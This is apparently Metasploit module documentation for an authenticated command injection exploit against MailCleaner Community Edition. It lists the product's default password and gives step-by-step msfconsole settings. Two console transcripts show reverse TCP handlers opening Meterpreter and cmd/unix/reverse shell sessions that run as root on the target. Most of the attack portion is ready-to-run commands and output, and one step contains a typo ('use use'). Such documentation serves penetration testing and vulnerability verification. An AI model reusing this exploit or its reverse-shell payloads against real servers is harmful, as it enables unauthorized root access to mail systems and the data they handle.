## Description This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root. ### Vulnerable Application You can download ISO file from following URL. [https://www.mailcleaner.org/latest-downloads/](https://www.mailcleaner.org/latest-downloads/) At the time of this writing all the passwords of users such as root or admin user was "MCPassw0rd". ## Verification Steps A successful check of the exploit will look like this: 1. Start `msfconsole` 2. `use use exploit/linux/http/mailcleaner` 3. Set `RHOST` 4. Set `LHOST` 5. Set `USERNAME` 6. Set `PASSWORD` 7. Run `exploit` 8. **Verify** that you are seeing ` Awesome..! Authenticated`. 9. **Verify** that you are getting `meterpreter` session. ## Scenarios ``` msf > use exploit/linux/http/mailcleaner_exec msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 RHOSTS => 12.0.0.100 msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin USERNAME => admin msf exploit(linux/http/mailcleaner_exec) > set PASSWORD PASSWORD => qwe123 msf exploit(linux/http/mailcleaner_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Performing authentication... [+] Awesome..! Authenticated with admin: [*] Exploiting command injection flaw [*] Sending stage (53508 bytes) to 12.0.0.100 [*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.100:44974) at 2018-12-19 17:24:44 +0300 [*] Sending stage (53508 bytes) to 12.0.0.100 [*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.100:44975) at 2018-12-19 17:24:45 +0300 meterpreter > ``` You can also use cmd payloads. ``` msf > use exploit/linux/http/mailcleaner_exec msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 RHOSTS => 12.0.0.100 msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin USERNAME => admin msf exploit(linux/http/mailcleaner_exec) > set PASSWORD msf exploit(linux/http/mailcleaner_exec) > set target 1 msf exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(linux/http/mailcleaner_exec) > run [*] Started reverse TCP double handler on 12.0.0.1:4444 [*] Performing authentication... [+] Awesome..! Authenticated with admin:MCPassw0rd [*] Exploiting command injection flaw [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo P6zixt2asYXZ29NE; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "P6zixt2asYXZ29NE\r\n" [*] Matching... [*] A is input... [*] Command shell session 2 opened (12.0.0.1:4444 -> 12.0.0.100:53996) at 2018-12-20 12:09:32 +0300 id uid=0(root) gid=1003(mailcleaner) groups=1003(mailcleaner) ```